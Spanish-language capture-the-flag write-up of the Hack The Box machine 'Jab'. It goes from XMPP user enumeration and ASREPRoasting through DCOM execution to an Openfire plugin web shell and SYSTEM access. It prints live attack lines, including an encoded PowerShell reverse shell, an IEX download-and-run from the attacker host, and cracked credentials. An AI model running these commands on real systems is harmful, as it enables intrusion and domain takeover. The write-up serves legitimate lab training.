Table of Contents

Hack The Box: Jab Writeup

Welcome to my detailed writeup of the medium difficulty machine “Jab” on Hack The Box. This writeup will cover the steps taken to achieve initial foothold and escalation to root.

TCP Enumeration

1$ rustscan -a 10.129.230.215 --ulimit 5000 -g
210.129.230.215 -> [53,88,135,139,389,445,464,593,636,3268,3269,5222,5223,5262,5263,5270,5269,7777,9389,5276,5275,5985,47001,49771,49703,49696,49694,49695,49673,49667,49666,49664,49665]

  1$ nmap -p53,88,135,139,389,445,464,593,636,3268,3269,5222,5223,5262,5263,5270,5269,7777,9389,5276,5275,5985,47001,49771,49703,49696,49694,49695,49673,49667,49666,49664,49665 -sCV 10.129.230.215 -oN allPorts
  2Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-03 19:11 CEST
  3Stats: 0:00:31 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
  4Service scan Timing: About 54.55% done; ETC: 19:12 (0:00:25 remaining)
  5Nmap scan report for 10.129.230.215
  6Host is up (0.039s latency).
  7
  8PORT      STATE SERVICE       VERSION
  953/tcp    open  domain        Simple DNS Plus
 1088/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-08-03 15:12:13Z)
 11135/tcp   open  msrpc         Microsoft Windows RPC
 12139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
 13389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
 14|_ssl-date: 2024-08-03T15:13:29+00:00; -1h59m39s from scanner time.
 15| ssl-cert: Subject: commonName=DC01.jab.htb
 16| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
 17| Not valid before: 2023-11-01T20:16:18
 18|_Not valid after:  2024-10-31T20:16:18
 19445/tcp   open  microsoft-ds?
 20464/tcp   open  kpasswd5?
 21593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
 22636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
 23|_ssl-date: 2024-08-03T15:13:29+00:00; -1h59m39s from scanner time.
 24| ssl-cert: Subject: commonName=DC01.jab.htb
 25| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
 26| Not valid before: 2023-11-01T20:16:18
 27|_Not valid after:  2024-10-31T20:16:18
 283268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
 29| ssl-cert: Subject: commonName=DC01.jab.htb
 30| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
 31| Not valid before: 2023-11-01T20:16:18
 32|_Not valid after:  2024-10-31T20:16:18
 33|_ssl-date: 2024-08-03T15:13:29+00:00; -1h59m39s from scanner time.
 343269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
 35|_ssl-date: 2024-08-03T15:13:29+00:00; -1h59m39s from scanner time.
 36| ssl-cert: Subject: commonName=DC01.jab.htb
 37| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
 38| Not valid before: 2023-11-01T20:16:18
 39|_Not valid after:  2024-10-31T20:16:18
 405222/tcp  open  jabber
 41| ssl-cert: Subject: commonName=dc01.jab.htb
 42| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
 43| Not valid before: 2023-10-26T22:00:12
 44|_Not valid after:  2028-10-24T22:00:12
 45| fingerprint-strings: 
 46|   RPCCheck: 
 47|_    <stream:error xmlns:stream="http://etherx.jabber.org/streams"><not-well-formed xmlns="urn:ietf:params:xml:ns:xmpp-streams"/></stream:error></stream:stream>
 48| xmpp-info: 
 49|   STARTTLS Failed
 50|   info: 
 51|     auth_mechanisms: 
 52|     capabilities: 
 53|     unknown: 
 54|     errors: 
 55|       invalid-namespace
 56|       (timeout)
 57|     stream_id: 4pv9473fdx
 58|     compression_methods: 
 59|     features: 
 60|     xmpp: 
 61|_      version: 1.0
 62|_ssl-date: TLS randomness does not represent time
 635223/tcp  open  ssl/jabber    Ignite Realtime Openfire Jabber server 3.10.0 or later
 64| ssl-cert: Subject: commonName=dc01.jab.htb
 65| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
 66| Not valid before: 2023-10-26T22:00:12
 67|_Not valid after:  2028-10-24T22:00:12
 68| xmpp-info: 
 69|   STARTTLS Failed
 70|   info: 
 71|     auth_mechanisms: 
 72|     capabilities: 
 73|     unknown: 
 74|     features: 
 75|     errors: 
 76|       (timeout)
 77|     compression_methods: 
 78|_    xmpp: 
 79|_ssl-date: TLS randomness does not represent time
 805262/tcp  open  jabber        Ignite Realtime Openfire Jabber server 3.10.0 or later
 81| xmpp-info: 
 82|   STARTTLS Failed
 83|   info: 
 84|     auth_mechanisms: 
 85|     capabilities: 
 86|     unknown: 
 87|     errors: 
 88|       invalid-namespace
 89|       (timeout)
 90|     stream_id: 31dkpsnust
 91|     compression_methods: 
 92|     features: 
 93|     xmpp: 
 94|_      version: 1.0
 955263/tcp  open  ssl/jabber    Ignite Realtime Openfire Jabber server 3.10.0 or later
 96| xmpp-info: 
 97|   STARTTLS Failed
 98|   info: 
 99|     auth_mechanisms: 
100|     capabilities: 
101|     unknown: 
102|     features: 
103|     errors: 
104|       (timeout)
105|     compression_methods: 
106|_    xmpp: 
107|_ssl-date: TLS randomness does not represent time
108| ssl-cert: Subject: commonName=dc01.jab.htb
109| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
110| Not valid before: 2023-10-26T22:00:12
111|_Not valid after:  2028-10-24T22:00:12
1125269/tcp  open  xmpp          Wildfire XMPP Client
113| xmpp-info: 
114|   STARTTLS Failed
115|   info: 
116|     auth_mechanisms: 
117|     capabilities: 
118|     unknown: 
119|     features: 
120|     errors: 
121|       (timeout)
122|     compression_methods: 
123|_    xmpp: 
1245270/tcp  open  ssl/xmpp      Wildfire XMPP Client
125| ssl-cert: Subject: commonName=dc01.jab.htb
126| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
127| Not valid before: 2023-10-26T22:00:12
128|_Not valid after:  2028-10-24T22:00:12
129|_ssl-date: TLS randomness does not represent time
1305275/tcp  open  jabber        Ignite Realtime Openfire Jabber server 3.10.0 or later
131| xmpp-info: 
132|   STARTTLS Failed
133|   info: 
134|     auth_mechanisms: 
135|     capabilities: 
136|     unknown: 
137|     errors: 
138|       invalid-namespace
139|       (timeout)
140|     stream_id: am31c60wbx
141|     compression_methods: 
142|     features: 
143|     xmpp: 
144|_      version: 1.0
1455276/tcp  open  ssl/jabber    Ignite Realtime Openfire Jabber server 3.10.0 or later
146| xmpp-info: 
147|   STARTTLS Failed
148|   info: 
149|     auth_mechanisms: 
150|     capabilities: 
151|     unknown: 
152|     features: 
153|     errors: 
154|       (timeout)
155|     compression_methods: 
156|_    xmpp: 
157|_ssl-date: TLS randomness does not represent time
158| ssl-cert: Subject: commonName=dc01.jab.htb
159| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
160| Not valid before: 2023-10-26T22:00:12
161|_Not valid after:  2028-10-24T22:00:12
1625985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
163|_http-server-header: Microsoft-HTTPAPI/2.0
164|_http-title: Not Found
1657777/tcp  open  socks5        (No authentication; connection failed)
166| socks-auth-info: 
167|_  No authentication
1689389/tcp  open  mc-nmf        .NET Message Framing
16947001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
170|_http-server-header: Microsoft-HTTPAPI/2.0
171|_http-title: Not Found
17249664/tcp open  msrpc         Microsoft Windows RPC
17349665/tcp open  msrpc         Microsoft Windows RPC
17449666/tcp open  msrpc         Microsoft Windows RPC
17549667/tcp open  msrpc         Microsoft Windows RPC
17649673/tcp open  msrpc         Microsoft Windows RPC
17749694/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
17849695/tcp open  msrpc         Microsoft Windows RPC
17949696/tcp open  msrpc         Microsoft Windows RPC
18049703/tcp open  msrpc         Microsoft Windows RPC
18149771/tcp open  msrpc         Microsoft Windows RPC
1821 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
183SF-Port5222-TCP:V=7.94SVN%I=7%D=8/3%Time=66AE64EC%P=x86_64-pc-linux-gnu%r(
184SF:RPCCheck,9B,"<stream:error\x20xmlns:stream=\"http://etherx\.jabber\.org
185SF:/streams\"><not-well-formed\x20xmlns=\"urn:ietf:params:xml:ns:xmpp-stre
186SF:ams\"/></stream:error></stream:stream>");
187Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
188
189Host script results:
190| smb2-time: 
191|   date: 2024-08-03T15:13:21
192|_  start_date: N/A
193| smb2-security-mode: 
194|   3:1:1: 
195|_    Message signing enabled and required
196|_clock-skew: mean: -1h59m39s, deviation: 0s, median: -1h59m39s
197
198Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
199Nmap done: 1 IP address (1 host up) scanned in 86.39 seconds

UDP Enumeration

 1$ sudo nmap --top-ports 1500 -sU --min-rate 5000 -n -Pn 10.129.230.215 -oN allPorts.UDP
 2Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-03 19:14 CEST
 3Nmap scan report for 10.129.230.215
 4Host is up (0.043s latency).
 5Not shown: 1495 open|filtered udp ports (no-response)
 6PORT     STATE  SERVICE
 753/udp   open   domain
 888/udp   open   kerberos-sec
 9123/udp  open   ntp
101040/udp closed netarx
111053/udp closed remote-as

De los escaneos con nmap sabemos que nos enfrentamos a un entorno de directorio activo. Descubrimos el dominio jab.htb y lo que seguramente sea el controlador de dominio, DC01.jab.htb

También vemos varios puertos que corresponden a un servicio jabber detectado por nmap. Y viendo que la máquina se llama Jab, lo tendré en cuenta. También vemos un servicio XMPP.

Otro servicio curioso es el 7777/TCP que supuestamente corresponde a un proxy de tipo socks5.

Ignite Realtime Openfire Jabber server 3.10.0.

Other Enumeration

Enumerando el SMB no conseguí nada con una null session, ni tampoco en el RPC.

Con LDAP tampoco consigo información relevante sin tener credenciales.

  1$ ldapsearch -H ldap://10.129.230.215 -x -s base -b '' "(objectClass=*)" "*" +
  2# extended LDIF
  3#
  4# LDAPv3
  5# base <> with scope baseObject
  6# filter: (objectClass=*)
  7# requesting: * + 
  8#
  9
 10#
 11dn:
 12domainFunctionality: 7
 13forestFunctionality: 7
 14domainControllerFunctionality: 7
 15rootDomainNamingContext: DC=jab,DC=htb
 16ldapServiceName: jab.htb:dc01$@JAB.HTB
 17isGlobalCatalogReady: TRUE
 18supportedSASLMechanisms: GSSAPI
 19supportedSASLMechanisms: GSS-SPNEGO
 20supportedSASLMechanisms: EXTERNAL
 21supportedSASLMechanisms: DIGEST-MD5
 22supportedLDAPVersion: 3
 23supportedLDAPVersion: 2
 24supportedLDAPPolicies: MaxPoolThreads
 25supportedLDAPPolicies: MaxPercentDirSyncRequests
 26supportedLDAPPolicies: MaxDatagramRecv
 27supportedLDAPPolicies: MaxReceiveBuffer
 28supportedLDAPPolicies: InitRecvTimeout
 29supportedLDAPPolicies: MaxConnections
 30supportedLDAPPolicies: MaxConnIdleTime
 31supportedLDAPPolicies: MaxPageSize
 32supportedLDAPPolicies: MaxBatchReturnMessages
 33supportedLDAPPolicies: MaxQueryDuration
 34supportedLDAPPolicies: MaxDirSyncDuration
 35supportedLDAPPolicies: MaxTempTableSize
 36supportedLDAPPolicies: MaxResultSetSize
 37supportedLDAPPolicies: MinResultSets
 38supportedLDAPPolicies: MaxResultSetsPerConn
 39supportedLDAPPolicies: MaxNotificationPerConn
 40supportedLDAPPolicies: MaxValRange
 41supportedLDAPPolicies: MaxValRangeTransitive
 42supportedLDAPPolicies: ThreadMemoryLimit
 43supportedLDAPPolicies: SystemMemoryLimitPercent
 44supportedControl: 1.2.840.113556.1.4.319
 45supportedControl: 1.2.840.113556.1.4.801
 46supportedControl: 1.2.840.113556.1.4.473
 47supportedControl: 1.2.840.113556.1.4.528
 48supportedControl: 1.2.840.113556.1.4.417
 49supportedControl: 1.2.840.113556.1.4.619
 50supportedControl: 1.2.840.113556.1.4.841
 51supportedControl: 1.2.840.113556.1.4.529
 52supportedControl: 1.2.840.113556.1.4.805
 53supportedControl: 1.2.840.113556.1.4.521
 54supportedControl: 1.2.840.113556.1.4.970
 55supportedControl: 1.2.840.113556.1.4.1338
 56supportedControl: 1.2.840.113556.1.4.474
 57supportedControl: 1.2.840.113556.1.4.1339
 58supportedControl: 1.2.840.113556.1.4.1340
 59supportedControl: 1.2.840.113556.1.4.1413
 60supportedControl: 2.16.840.1.113730.3.4.9
 61supportedControl: 2.16.840.1.113730.3.4.10
 62supportedControl: 1.2.840.113556.1.4.1504
 63supportedControl: 1.2.840.113556.1.4.1852
 64supportedControl: 1.2.840.113556.1.4.802
 65supportedControl: 1.2.840.113556.1.4.1907
 66supportedControl: 1.2.840.113556.1.4.1948
 67supportedControl: 1.2.840.113556.1.4.1974
 68supportedControl: 1.2.840.113556.1.4.1341
 69supportedControl: 1.2.840.113556.1.4.2026
 70supportedControl: 1.2.840.113556.1.4.2064
 71supportedControl: 1.2.840.113556.1.4.2065
 72supportedControl: 1.2.840.113556.1.4.2066
 73supportedControl: 1.2.840.113556.1.4.2090
 74supportedControl: 1.2.840.113556.1.4.2205
 75supportedControl: 1.2.840.113556.1.4.2204
 76supportedControl: 1.2.840.113556.1.4.2206
 77supportedControl: 1.2.840.113556.1.4.2211
 78supportedControl: 1.2.840.113556.1.4.2239
 79supportedControl: 1.2.840.113556.1.4.2255
 80supportedControl: 1.2.840.113556.1.4.2256
 81supportedControl: 1.2.840.113556.1.4.2309
 82supportedControl: 1.2.840.113556.1.4.2330
 83supportedControl: 1.2.840.113556.1.4.2354
 84supportedCapabilities: 1.2.840.113556.1.4.800
 85supportedCapabilities: 1.2.840.113556.1.4.1670
 86supportedCapabilities: 1.2.840.113556.1.4.1791
 87supportedCapabilities: 1.2.840.113556.1.4.1935
 88supportedCapabilities: 1.2.840.113556.1.4.2080
 89supportedCapabilities: 1.2.840.113556.1.4.2237
 90subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=jab,DC=htb
 91serverName: CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configur
 92 ation,DC=jab,DC=htb
 93schemaNamingContext: CN=Schema,CN=Configuration,DC=jab,DC=htb
 94namingContexts: DC=jab,DC=htb
 95namingContexts: CN=Configuration,DC=jab,DC=htb
 96namingContexts: CN=Schema,CN=Configuration,DC=jab,DC=htb
 97namingContexts: DC=DomainDnsZones,DC=jab,DC=htb
 98namingContexts: DC=ForestDnsZones,DC=jab,DC=htb
 99isSynchronized: TRUE
100highestCommittedUSN: 266344
101dsServiceName: CN=NTDS Settings,CN=DC01,CN=Servers,CN=Default-First-Site-Name,
102 CN=Sites,CN=Configuration,DC=jab,DC=htb
103dnsHostName: DC01.jab.htb
104defaultNamingContext: DC=jab,DC=htb
105currentTime: 20240803152352.0Z
106configurationNamingContext: CN=Configuration,DC=jab,DC=htb
107
108# search result
109search: 2
110result: 0 Success
111
112# numResponses: 2
113# numEntries: 1

Enumerating XMPP

Vamos a instalar un client XMPP. Desde la página de Jabber se recomienda varios así que me he decidido por Gajim

$ sudo apt-get install gajim

Intentando crear una cuenta.. Write-up Image

Write-up Image

Probando el dominio.. Write-up Image

Write-up Image

Para evitar problemas, voy a desactivar el usar conexiones encriptadas, así no utilizaremos el SSL y no me dará problemas ya que es un certificado autofirmado. Write-up Image

Si nos dirigimos a Acconts -> Discover Services

Vemos varios servicios. Write-up Image

Si nos dirigimos al servicio de User Searchy introducimos una wildcard conseguimos muchos usuarios que nos pueden venir para enumerar el protocolo de Kerberos. Write-up Image

El problema es que no podemos copiar y pegar rápidamente..

Además son muchos usuarios, por lo cual podría cambiar de cliente XMPP buscando alguno que tenga una función para poder exportar, o debug…

¿Pero para que, si tenemos python?

Primero vemos como se tramita la data en wireshark y podemos ver que se tramita en varios paquetes en un XML gigante. Write-up Image

Este es el script.

 1from scapy.all import sniff, TCP, IP
 2import re
 3import signal
 4
 5users = []
 6
 7def save_to_file(x,y):
 8    # Eliminando repetidos..
 9    users_list = list(set(users))
10    print("[!] Guardando %i usuarios y saliendo..." % len(users_list))
11    with open("users.txt", "w") as txt:
12        for user in users_list:
13            txt.write(user + "\n")
14        exit(0)
15    
16signal.signal(signal.SIGINT, save_to_file)
17
18def packet_callback(packet):
19    if packet.haslayer(TCP):
20        ip_layer = packet[IP]
21        tcp_layer = packet[TCP]
22        data = bytes(tcp_layer.payload)
23        if data:
24            # print(f"[{ip_layer.src}:{tcp_layer.sport} -> {ip_layer.dst}:{tcp_layer.dport}] {data}")
25            pattern = r'<value>(.*?)<'
26            matches = re.findall(pattern,data.decode('utf-8'))
27            for match in matches:
28                if '@' not in match and ' ' not in match and not match.isnumeric():
29                    users.append(match)
30                    print("[i] Found %i users" % len(users))
31
32def main():
33    # Sniff TCP packets on interface tun0
34    interface = "tun0"
35    print(f"Sniffing TCP packets on {interface}...")
36    sniff(filter="tcp", iface=interface, prn=packet_callback, store=0)
37
38if __name__ == "__main__":
39    main()

Simple pero nos sirve, simplemente captura el tráfico TCP por tun0 y aplica una expresión regular para quedarse con la data dentro de <value>DATA<. Luego nos quedamos con los que no contengan espacios ni @ , de esta forma nos quedamos con algunos falsos positivos y con los usuarios.

Mientras estamos ejecutando el script, ejecutamos varias veces la consulta de usuarios para asegurar que no se nos olvida ninguno, al guardar el archivo se eliminan repetidos así que perfecto.

 1$ sudo python3 sniff.py 
 2Sniffing TCP packets on tun0...
 3[i] Found 1 users
 4[i] Found 2 users
 5[i] Found 3 users
 6[i] Found 4 users
 7[i] Found 5 users
 8[i] Found 6 users
 9...
10[i] Found 3247 users
11[i] Found 3248 users
12[i] Found 3249 users
13^C[!] Guardando 2118 usuarios y saliendo...

1$ cat users.txt  | head -n 10
2aworrell
3astuart
4mfulk
5econdie
6anellis
7gnolte

Ahora, podemos confirmar cuantos usuarios son válidos con kerbrute $ /opt/kerbrute userenum --dc 10.129.230.215 -d jab.htb users.txt

2024/08/03 20:11:52 > Done! Tested 2117 usernames (2112 valid) in 9.794 seconds

Ahora parseamos los usuarios exportados.

1$ rm users.txt 
2rm: remove write-protected regular file 'users.txt'? y
3┌─[192.168.1.52]─[pointedsec@parrot]─[~/Desktop/jab/content]
4└──╼ [★]$ cat valid_users.txt | awk '{print $7}' | cut -d'@' -f1 > users.txt

ASREPRoast

Ahora que tenemos una lista de usuarios, podemos con impacket-GetNPUsers ejecutar un ataque de tipo ASREPRoast para obtener hashes de los tickets TGT y crackearlos.

impacket-GetNPUsers -no-pass -usersfile users.txt jab.htb/ -o hashes

¡Y obtenemos algunos hashes!

lbradford
jmontgomery
mlowe

Cracking the hashes

$ john -w=/usr/share/wordlists/rockyou.txt hashes
...
Midnight_121     ($krb5asrep$23$jmontgomery@JAB.HTB)

Solo he conseguido crackear ese TGT.

Con netexec podemos confirmar estas credenciales.

1nxc smb 10.129.230.215 -u 'jmontgomery' -p 'Midnight_121'
2SMB         10.129.230.215  445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:jab.htb) (signing:True) (SMBv1:False)
3SMB         10.129.230.215  445    DC01             [+] jab.htb\jmontgomery:Midnight_121

Bloodhound Python

Lo primero que se me ocurrió es con bloodhound-python podemos hacer una enumeración para ver si tenemos algún privilegio sobre otros objetos.

1$ bloodhound-python -ns 10.129.230.215 -dc dc01.jab.htb -d jab.htb -c All -u 'jmontgomery' -p 'Midnight_121'

Write-up Image

Ahora lo importamos al bloodhound

Vemos que pertenece a un grupo Contractors pero no vemos nada interesante. Write-up Image

Obtaining svc_openfire credentials

Así que después de un rato, intenté iniciar sesión en el XMPP como este usuario. Write-up Image

También vemos que este usuario tiene una foto de perfil de kali linux por lo cual podemos deducir que a lo mejor tiene algo que ver con la ciberseguridad de la empresa. Write-up Image

Buscando las conferencias, vemos un grupo interesante. Write-up Image

No veo nada… Write-up Image

Investigando un poco, decidí cambiar de cliente XMPP porque había alcanzado un punto muerto donde poca cosa podía hacer.

Instalé pidgin otro cliente recomendado desde jabber.at

Configuramos la cuenta de usuario.. Write-up Image

Vemos la sala, nos unimos.. Write-up Image

Y ahora sí vemos algo… Vemos un hash crackeado para la cuenta svc_openfire Write-up Image svc_openfire:!@#$%^&*(1qazxsw

Podemos comprobar estas credenciales

1$ nxc smb 10.129.230.215 -u 'svc_openfire' -p '!@#$%^&*(1qazxsw'
2SMB         10.129.230.215  445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:jab.htb) (signing:True) (SMBv1:False)
3SMB         10.129.230.215  445    DC01             [+] jab.htb\svc_openfire:!@#$%^&*(1qazxsw

Getting Foothold

Ahora volvemos al bloodhound y establecemos como Owned esta cuenta de usuario.

Vemos que este usuario pertenece al grupo Distributed COM Users en DC01.JAB.HTB. Se podría acontecer ejecución de código si se cumplen ciertas condiciones. Write-up Image

Viendo este post en medium, conseguí ejecución remota de comandos probando varios comandos…

1$ impacket-dcomexec -object MMC20 jab.htb/svc_openfire:'!@#$%^&*(1qazxsw'@dc01.jab.htb 'ping 10.10.14.80' -debug -silentcommand
2Impacket v0.11.0 - Copyright 2023 Fortra
3
4[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
5[+] Target system is dc01.jab.htb and isFQDN is True
6[+] StringBinding: DC01[60242]
7[+] StringBinding chosen: ncacn_ip_tcp:dc01.jab.htb[60242]

 1$ sudo tcpdump -i tun0 icmp
 2tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
 3listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
 421:02:15.015723 IP dc01.jab.htb > 10.10.14.80: ICMP echo request, id 1, seq 165, length 40
 521:02:15.015865 IP 10.10.14.80 > dc01.jab.htb: ICMP echo reply, id 1, seq 165, length 40
 621:02:16.023460 IP dc01.jab.htb > 10.10.14.80: ICMP echo request, id 1, seq 166, length 40
 721:02:16.023492 IP 10.10.14.80 > dc01.jab.htb: ICMP echo reply, id 1, seq 166, length 40
 821:02:17.026112 IP dc01.jab.htb > 10.10.14.80: ICMP echo request, id 1, seq 167, length 40
 921:02:17.026142 IP 10.10.14.80 > dc01.jab.htb: ICMP echo reply, id 1, seq 167, length 40
1021:02:18.073972 IP dc01.jab.htb > 10.10.14.80: ICMP echo request, id 1, seq 168, length 40
1121:02:18.073997 IP 10.10.14.80 > dc01.jab.htb: ICMP echo reply, id 1, seq 168, length 40

Ahora con nishang, cogemos la típica reverse shell en powershell, Invoke-PowerShellTcp.ps1 y le añadimos esta línea al final del todo. Write-up Image

Ahora ofrecemos este archivo por el puerto 8081.

1$ python3 -m http.server 8081
2Serving HTTP on 0.0.0.0 port 8081 (http://0.0.0.0:8081/) ...

Nos ponemos en escucha por el puerto 443.

1$ sudo rlwrap -cEr nc -lvnp 443
2listening on [any] 443 ...

Y no conseguí mandarme la revshell. Así que alternativamente probé el típico payload en base64 con powershell -e y después de ejecutar varias veces el comando, quitando y poniendo el parámetro -silentcommand conseguí la reverse shell. Write-up Image

1$ impacket-dcomexec -object MMC20 jab.htb/svc_openfire:'!@#$%^&*(1qazxsw'@dc01.jab.htb 'powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AOAAwACIALAA0ADQAMwApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=' -debug

1$ sudo rlwrap -cEr nc -lvnp 443
2listening on [any] 443 ...
3connect to [10.10.14.80] from (UNKNOWN) [10.129.230.215] 53443
4whoami
5jab\svc_openfire
6PS C:\windows\system32>

1PS C:\Users\svc_openfire\Desktop> type user.txt
2d4c3ac560a3b52d...

Privilege Escalation

Reverse Port Forwarding

Como esta cuenta se llama svc_openfire supongo que debe de hacer un servicio de OpenFire detrás, así que busqué el puerto por defecto que utiliza. Write-up Image

Con netstat -ano… Write-up Image

Buscando por exploits, vemos que existen varios, entonces merece la pena con chisel hacer reverse port forwarding y echarle un vistazo. Write-up Image

Compartimos el chisel.exe

1PS C:\Users\svc_openfire\Desktop> iwr http://10.10.14.80:8081/chisel.exe -o chisel.exe

En la máquina atacante, nos ponemos en escucha por el puerto 1234.

1$ /opt/chisel/chisel server --reverse -p 1234
22024/08/03 21:26:09 server: Reverse tunnelling enabled
32024/08/03 21:26:09 server: Fingerprint TkIa7XucA1PPZW9WeqCImhwJucZLEX5ANfBz0bNaYk4=
42024/08/03 21:26:09 server: Listening on http://0.0.0.0:1234

En la máquina víctima

1PS C:\Users\svc_openfire\Desktop> .\chisel.exe client 10.10.14.80:1234 R:9090:127.0.0.1:9090

Y ahora, nuestro puerto 9090 local en la máquina atacante, corresponde al puerto 9090 de la máquina víctima.

12024/08/03 21:26:44 server: session#1: tun: proxy#R:9090=>9090: Listening

Lo podemos comprobar.. Write-up Image

La versión es Openfire, Version: 4.7.5

Revisemos este PoC

Este exploit se basa en una cadena de exploits, donde se abusa de CVE-2023-32315 saltándonos la autenticación, para posteriormente subir un plugin malicioso y conseguir una web shell.

Aunque de nada sirve ya que las credenciales svc_openfire:!@#$%^&*(1qazxsw sirven para poder iniciar sesión por lo cual nos podemos saltar la Authentication Bypass.

Igualmente vamos a utilizar el archivo .jar que contiene la web shell. Write-up Image

Write-up Image

Subimos el plugin correctamente. Write-up Image

Nos dirigimos a la ruta /plugins/openfire-management-tool-plugin/cmd.jsp

Nos pide una contraseña, esta contraseña es 123. Write-up Image

Y este servicio lo está ejecutando el equipo DC01$ por lo cual el usuario asociado es nt authority\system Write-up Image

Ahora ofrecemos de nuevo el Invoke-PowerShellTcp.ps1 y ejecutamos powershell IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.80:8081/Invoke-PowerShellTcp.ps1') | powershell -noprofile en la web shell para descargarnos este archivo y ejecutarlo, así obtendremos una reverse shell siempre que estemos en escucha con netcat por el puerto 443 ya que así edité el archivo anteriormente.

1$ sudo rlwrap -cEr nc -lvnp 443
2listening on [any] 443 ...
3connect to [10.10.14.80] from (UNKNOWN) [10.129.230.215] 53632
4Windows PowerShell running as user DC01$ on DC01
5Copyright (C) 2015 Microsoft Corporation. All rights reserved.
6
7PS C:\Program Files\Openfire\bin>whoami
8nt authority\system

Y ya podríamos leer la flag

1PS C:\Users\Administrator\DESKTOP> type root.txt
28183d8610ccffd7fda598bd31424ebfb

Happy Hacking! 🚀

#HackTheBox #Jab #Writeup #Cybersecurity #Penetration Testing #CTF #Reverse Shell #Privilege Escalation #RCE #Exploit #Windows #Openfire Jabber Enumeration #XMPP Enumeration #Scripting #Python Scripting #ASREPRoasting #Password Cracking #Information Leakage #User Pivoting #Abusing ExecuteDCOM #Reverse Port Forwarding #Openfire